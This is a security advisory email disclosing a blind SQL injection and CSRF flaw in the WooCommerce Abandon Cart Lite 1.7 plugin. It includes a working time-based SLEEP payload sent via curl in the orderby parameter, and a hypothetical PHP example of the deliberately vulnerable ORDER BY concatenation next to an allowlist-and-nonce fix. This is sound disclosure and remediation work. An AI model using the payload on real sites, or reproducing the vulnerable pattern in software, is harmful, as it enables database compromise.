Subject: Blind SQL injection in WooCommerce Abandon Cart Lite Plugin 1.7
Date: Wed, 15 Jul 2015 19:12:04 +0200

Hello,

Plugin: WooCommerce Abandon Cart Lite Plugin 1.7 https://wordpress.org/plugins/woocommerce-abandoned-cart/

Authenticated users with the manage_woocommerce capability (Shop Manager and Administrator accounts) can execute arbitrary SQL. The page performs no CSRF (nonce) check, so an attacker without an account can also trigger the injection by getting such a user to open a crafted admin.php URL.

1. SQL injection (woocommerce_abandon_cart::woocommerce_ac_page())

Method: GET
Url: http://localhost/wp-admin/admin.php?page=woocommerce_ac_page&orderby=[sqli]
Vulnerable parameters: orderby (confirmed), order (suspected, not confirmed)

Example PHP callstack:
woocommerce_abandon_cart::woocommerce_ac_page   [/woocommerce-abandoned-cart/woocommerce-ac.php:847]
wpdb::get_results

Verification (the cookie is a logged-in session with manage_woocommerce; the response is delayed by about five seconds when the injected SLEEP(5) executes):
curl --cookie "..." "http://localhost/wp-admin/admin.php?page=woocommerce_ac_page&orderby=%60%2C%28SELECT+%2A+FROM+%28SELECT+SLEEP%285%29%29X%29%3B--+-"

Decoded orderby value: `,(SELECT * FROM (SELECT SLEEP(5))X);-- -
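
The pattern behind this class of bug and the fix a plugin author would apply, as an added example. This is a hypothetical reconstruction written for this note, not the plugin's code: the table name, the column allowlist, the nonce action name and the function names are assumptions. How the plugin quotes the column name is not visible from the advisory; the sketch assumes the GET value is interpolated into the query string, which is what the payload above exploits.

```php
<?php
// Added example: hypothetical reconstruction of the vulnerable pattern and its
// fix. NOT the plugin's actual code; table, columns and nonce names are assumed.

// Vulnerable pattern: orderby/order from the request are concatenated straight
// into the ORDER BY clause. A value that closes the surrounding quoting and
// opens a new expression (e.g. a subquery calling SLEEP()) reaches the parser,
// and a trailing "-- -" comments out whatever follows. Because no nonce is
// checked, a crafted link opened by a logged-in shop manager triggers it too.
function ac_list_carts_vulnerable( $wpdb ) {
    $orderby = isset( $_GET['orderby'] ) ? $_GET['orderby'] : 'id';
    $order   = isset( $_GET['order'] ) ? $_GET['order'] : 'DESC';
    $sql = "SELECT * FROM `{$wpdb->prefix}ac_abandoned_cart_history_lite` " // table name assumed
         . "ORDER BY `{$orderby}` {$order}";
    return $wpdb->get_results( $sql );
}

// Hardened form: the request may only *select* among fixed column names and
// the two sort directions; nothing attacker-controlled is ever placed in the
// SQL string. The nonce check stops the cross-site (CSRF) trigger.
function ac_list_carts_hardened( $wpdb ) {
    // Nonce action name is an assumption; links to this page would be built
    // with wp_nonce_url( $url, 'woocommerce_ac_list' ) so the check passes.
    check_admin_referer( 'woocommerce_ac_list' );

    // Allowlist of sortable columns (assumed names). Strict comparison so that
    // "0" or other loosely-equal values cannot slip through in_array().
    $allowed_columns = array( 'id', 'user_id', 'abandoned_cart_time', 'cart_total' );
    $orderby = isset( $_GET['orderby'] ) ? (string) $_GET['orderby'] : 'id';
    if ( ! in_array( $orderby, $allowed_columns, true ) ) {
        $orderby = 'id'; // unknown column name: fall back, do not echo it into SQL
    }

    // Sort direction reduced to exactly one of two literals.
    $order = ( isset( $_GET['order'] ) && 'ASC' === strtoupper( (string) $_GET['order'] ) )
        ? 'ASC' : 'DESC';

    // $orderby and $order are now literals chosen from fixed sets, so
    // interpolating them is safe. Numeric values still go through prepare().
    $sql = $wpdb->prepare(
        "SELECT * FROM `{$wpdb->prefix}ac_abandoned_cart_history_lite` "
        . "ORDER BY `{$orderby}` {$order} LIMIT %d",
        100
    );
    return $wpdb->get_results( $sql );
}
```

Identifiers (column names, sort direction) cannot be passed as bound parameters to `$wpdb->prepare()`, so an allowlist is the only correct control for an ORDER BY clause; escaping the value with esc_sql() would not help here because the injected payload needs no quote characters. The nonce check is a separate fix for the CSRF vector and should be applied even after the SQL is fixed.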

-- 
Regards,
Marcin Probola,